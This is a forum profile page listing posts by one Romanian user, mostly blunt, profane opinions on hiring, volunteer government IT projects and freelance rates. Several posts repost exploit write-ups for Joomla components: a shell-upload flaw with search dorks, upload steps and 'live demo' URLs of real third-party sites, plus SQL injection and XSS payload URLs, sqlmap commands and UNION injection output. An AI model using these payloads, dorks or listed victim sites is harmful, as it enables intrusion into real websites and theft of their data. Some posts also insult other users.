Jump to content

hades

Active Members
  • Posts

    1494
  • Joined

  • Last visited

  • Days Won

    15

Everything posted by hades

  1. @MrGrj: Vezi ca eu iti iau interviu. Te simti pregatit?
  2. Caut un Python web dev pentru o pozitie full-time in Cluj. Nivel de senioritate: mid/senior PM cu cv-uri daca sunt clujeni interesati.
  3. A zis baiatu ca toata lumea poate scrie cod; ce pula mea stati si plangeti aici de ban-uri, cand va stau proiectele cacalau la usa? Aaaa, codu ala de cacat nu e platit? Nasol.
  4. Nu oricine poate invata. Aia care cred ca 'oricine poate invata' is aia pe care-i trimit acasa si le spun ca revin cu un telefon cand trec pe la interviu. Ah, si muie lu ala ce a scris articolul. Sa 'scri cod' 11h nu e pentru toti.
  5. LinkAcademy e cacat.
  6. Ultimul meu reply la threadul asta, pentru ca nu vreau sa stric treaba lui @Domnul.Do. Daca aceasta initiativa atrage oameni care se gandesc ca aplicatiile software se dezvolta cu niste linii de cod intre 2 halbe de bere pe principiu: "Am cum, in schimb, sa contribui seara cu cateva linii de cod la unul sau mai multe proiecte sprijinite de guvern, mai ales daca eu consider ca asta poate sa duca la o schimbare in bine a lumii in care traiesc." ne-am supt la pula si prefer sa stau la coada decat sa-mi las datele prin aplicatii d-astea. Salutare si mult noroc. @MariusPopescu nu te obosi sa faci pe inteligentu si sa-mi diseci reply-ul.
  7. Bre @MariusPopescu, iti raspund doar la un punct din alea mentionate de tine acolo la tine-n reply, ca mai mult nu meriti, sincer: "- alpha testeri - da, de ce nu alpha testeri voluntari? aici pool-ul de selectie e chiar mult mai larg, ca nu trebuie decat sa ai un calculator si net ca sa fii tester." ^ Poate ca ma refeream la judete unde serviciile publice existente sa fie de-acord sa testeze in paralel sau poate chiar sa inlocuieasca pentru o vreme solutiile existente. Dar asta e problema celor ca tine, ca balesc cand aud de 'open source' si 'voluntariat' si 'IT' venind de la Guvern, fara sa puna lucrurile in perspectiva. Daca tot e asa usor, de ce mama naibii nu v-ati apucat pana acuma sa scoateti o aplicatie si sa mergeti sa le-o dati peste nas alora de-acolo?
  8. Sa le luam pe rand: 1. @theeternalwanderer: Teoretic, open source suna exceptional si este exceptional, pana in punctul in care vorbim de BANI sau proiecte GUVERNAMENTALE care opereaza date cu caracter personal. DA, open-source deschide cai de audit extern, contributii si alte cele, dar haideti sa ne uitam putin la cazul Ethereum si la succesul ce l-au avut ei cu open source (proiectul intra la categoria bani). 2. @Domnul.Do : Eu nu sunt aici ca sa tai aripile tinerilor care doresc sa contribuie. Doamne'ajuta, ca e mai ok sa faca asta decat laba la calculator. Totusi, daca exista din partea guvernului asteptari la proiecte serioase, trebuie luati in evidenta si alti factori. Poti sa strangi tu 10 pasionati de programare si ei pot sa codeze exceptional, dar, cum ramane cu researchul pentru proiect? Presupunand ca vrei sa livrezi un produs de calitate iti trebuie un studiu de piata, iti trebuie INFRASTRUCTURA iti trebuie traininguri (ca nu toti candidatii sunt jack of all trades), ai nevoie de alpha testeri, ai nevoie de oameni care sa stabileasca un roadmap si multe altele. In toate stirile si in ce am citit, se pune accentul pe produsul final si pe faptul ca voluntarii o sa faca treaba buna, doar ca ai nevoie de mult prea multi oameni full time implicati in proiect, ca sa iesi pe piata cu o solutie viabila.
  9. @Domnul.Do: Sunt total impotriva aplicatiilor open source folosite in sistemul public. Pentru a evita scurgerea de fonduri pe aplicatii de rahat, nu e nevoie de open source. E nevoie de project management si de auditing serios.
  10. @Andrei: Nu e vorba de atitudine standard 'anti orice'. E vorba de faptul ca infrastructura necesara pentru eliminarea birocratiei nu e o chestie care se naste din voluntariat. E nevoie de project management, bugete si oameni pertinenti. Oamenii pertinenti nu sunt ieftini in domeniul IT, dupa cum probabil stii asta.
  11. Salut, Toata lumea 'busted a nut' cand a auzit de proiectul asta, uitand de scenariile in care website-uri precum http://mapn.gov.ro/ se faceau pe milioane de euro. Timpul meu inseamna bani, si vrajeala cu 'facem tara mai buna' a expirat in momentul in care am vazut ca pentru proiecte de cacat exista fonduri, iar acum se pune problema voluntariatului. Ah, bursele alea de 2k euro sunt sub pretul pietii. Lucrezi sub 4 ore pe zi si faci banii aia intr-o luna, in acelasi domeniu (IT), fara bataia de cap adusa de toti batranii din sistem, din confortul casei tale. Sunt curios de ce 'specialisti' or sa fie luati in program; Mai mult, sunt foarte curios de rezultatul final. Poate o sa fie tot o poveste gen Siveco & EDU.RO.
  12. hades

    Angajări

    @kidink: Tariful meu este de 35$/h. Un articol documentat, scris si editat imi ia in jur de 3-4h. Esti dispus sa platesti 140$ / articol?
  13. Cancer de dimineata.
  14. O poveste foarte interesanta. Lacheii care cauta metode de facut bani ar trebui sa citeascas asta si sa puna osu la treaba. Nu iti trebuie mai mult de-atat.
  15. ################################################################ # Exploit Title : Joomla com_weblinks Shell Upload Vulnerability # Exploit Author : howucan # Website : http://howucan.gr # Dork : allinurl:/index.php?option e_name jform_description asset=com_weblinks # Software link : http://extensions.joomla.org/extensions/extension/official-extensions/weblinks # Tested on: [ Kali Linux 2 ] # Date: 2016/07/24 # video Proof : https://www.youtube.com/watch?v=rHM8XJUhBzQ # ###################### # [+] PoC : ###################### # 1 Select A Website From The Dork Above # 2 http://localhost/site/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author= # 3 Just Upload your Shell or Txt or Image to Upload Field # 4 Shell Directory : http://localhost/site/images/shell.txt # Ex http://www.verenikelife2009.gr/images/a.txt ###################### # [+] Live Demo: # http://www.orrca.org.au/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author= # http://egyptfuntours.com/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author= # http://englishshotokan.net/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author= ################################################################# via
  16. Title: XSS and SQLi in huge IT gallery v1.1.5 for Joomla Fixed: v1.1.7 Author: Larry W. Cashdollar, @_larry0 and Elitza Neytcheva, @ElitzaNeytcheva Date: 2016-07-14 Download Site: http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-pro Vendor: huge-it.com Vendor Notified: 2016-07-15, fixed 2016-07-23 Vendor Contact: info@huge-it.com Description: The plugin allows you to add multiple images to the gallery, create countless galleries, add a description to each of them, as well as make the same things with video links. Vulnerability: The attacker must be logged in with at least manager level access or access to the administrative panel to exploit this vulnerability: SQL in code via id parameter: ./administrator/components/com_gallery/models/gallery.php 51 public function getPropertie() { 52 $db = JFactory::getDBO(); 53 $id_cat = JRequest::getVar('id'); 54 $query = $db->getQuery(true); 55 $query->select('#__huge_itgallery_images.name as name,' 56 . '#__huge_itgallery_images.id ,' 57 . '#__huge_itgallery_gallerys.name as portName,' 58 . 'gallery_id, #__huge_itgallery_images.description as description,image_url,sl_url,sl_type,link_target,#__huge_itg allery_images.ordering,#__huge_itgallery_images.published,published_in_sl_width'); 59 $query->from(array('#__huge_itgallery_gallerys' => '#__huge_itgallery_gallerys', '#__huge_itgallery_images' => '#__huge_itg allery_images')); 60 $query->where('#__huge_itgallery_gallerys.id = gallery_id')->where('gallery_id=' . $id_cat); 61 $query->order('ordering desc'); 62 64 $db->setQuery($query); 65 $results = $db->loadObjectList(); 66 return $results; 67 } XSS is here: root@Joomla:/var/www/html# find . -name "*.php" -exec grep -l "echo \$_GET" {} \; ./administrator/components/com_gallery/views/gallery/tmpl/default.php root@Joomla:/var/www/html# find . -name "*.php" -exec grep -n "echo \$_GET" {} \; 256: <a class="modal" rel="{handler: 'iframe', size: {x: 800, y: 500}}" href="index.php?option=com_gallery&view=video&tmpl=component&pid=<?php echo $_GET['id']; ?>" title="Image" > CVE Assignments:A CVE-2016-1000113 XSS,A CVE-2016-1000114 SQL Injection JSON: Export Exploit Code: XSS PoC http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=1--%20%22%3E%3Cscript%3Ealert(1);%3C/script%3E SQLi PoC http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=SQLiHERE $ sqlmap --load-cookies=cookies.txt -u "http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=*" --dbms mysql Screen Shots: Advisory:A http://www.vapidlabs.com/advisory.php?v=164 via
  17. ###################### # Exploit Title : Joomla com_showdown SQL injection Vulnerability # Exploit Author : xBADGIRL21 # Dork : inurl:index.php?option=com_showdown # version : 1.5.0 # Tested on: [ Windows 7 ] # skype:xbadgirl21 # Date: 2016/07/24 # video Proof : https://youtu.be/IglNYsDcV3g ###################### # [+] DESCRIPTION : ###################### # [+] an SQL injection been Detected in this Joomla components showdown after you add ['] or ["] to # [+] Vuln Target Parameter you will get error like : # [+] You have an error in your SQL syntax; check the manual that corresponds to your MySQL or # [+] You Will Notice a change in the Frontpage of the target . ###################### # [+] Poc : ###################### # [typeid] Get Parameter Vulnerable To SQLi # http://127.0.0.1/index.php?option=com_showdown&typeid=999999 [INJECT HERE] ###################### # [+] SQLmap PoC: ###################### # GET parameter 'typeid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] # # Parameter: typeid (GET) # Type: AND/OR time-based blind # Title: MySQL >= 5.0.12 AND time-based blind # Payload: option=com_showdown&typeid=11 AND SLEEP(5) # # Type: UNION query # Title: Generic UNION query (NULL) - 6 columns # Payload: option=com_showdown&typeid=11 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71627a6b71,0x4d7254764c576b495a504e73726d636f6a65695971624f6f64424e6870 # 43554447614a527451564c,0x71706a7171),NULL-- LZga # --- # [12:59:46] [INFO] the back-end DBMS is MySQL # web server operating system: Linux Debian 6.0 (squeeze) # web application technology: PHP 5.2.6, Apache 2.2.16 # back-end DBMS: MySQL >= 5.0.12 # [12:59:46] [INFO] fetching database names # available databases [3]: ###################### # [+] Live Demo : ###################### # http://www.circuse.eu/index.php?option=com_showdown&typeid=11 ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ###################### CommentsRSS Feed via
  18. Hai, ca deja o sugeti pe langa in threadu asta. Ati dat explicatii destule. Pe aici avem pretentia ca omu sa isi si doreasca sa invete/fie ajutat, nu doar sa ceara. Pentru alte nelamuriri, puteti folosi mesajele private, ca intru pe index si vad 100 posturi in Windows moloz. TC.
  19. Rezolvat cu EAdrian. Baiat gigel
  20. Salut, Am 2 PDF-uri care vreau sa fie 'transformate' in pagini HTML (le voi folosi ulteriori pentru a randa html-urile astea cu content-type de pdf, deci trebuie sa fie pdf friendly css-ul). Daca le are cineva cu astea, astept un PM cu o cotatie de pret. PDF-urile contin doar niste headere + un tabel. Tabel-ul poate fii cu lorem ipsum, oricum il generez dinamic.
  21. Sa-mi sugeti pula. TC.
  22. hades

    frf...

    Baietii cu haviju
  23. Cel mai amuzant e ca are toate linkurile alea salvate intr-un notepad. Nois.
  24. # Exploit Title: Joomla com_enmasse - SQL Injection # Author: [ Hamed Izadi ] #IRAN # Vendor Homepage : http://extensions.joomla.org/extensions/extension/social-web/social-buy/en-masse # Category: [ Webapps ] # Tested on: [ Win ] # Versions: 5.1-6.4 # Date: 2016/06/15 # Google Dork: inurl:component/enmasse/ # PoC: # id Parameter Vulnerable To SQL # Demo: # http://example.com/component/enmasse/term?tmpl=component&id=2%27 # Youtube: https://youtu.be/LB5qVnXhzXE # L u Arg via
×
×
  • Create New...